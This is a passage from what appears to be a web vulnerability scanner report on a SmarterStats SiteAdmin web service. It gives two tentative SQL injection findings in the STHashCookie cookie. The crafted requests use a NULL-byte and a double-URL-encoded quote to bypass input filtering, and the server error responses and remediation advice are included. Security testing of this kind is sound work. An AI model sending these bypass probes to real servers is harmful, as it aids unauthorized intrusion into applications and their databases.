<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.9. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%00'; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%00''; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19036
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetSite</h2>
<p class="intro">Returns one site listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/SiteInfoResult&gt;</pre>
</span>

</span>









</body>
</html>

2.10. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the STHashCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=MoveSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%2527; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:36 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

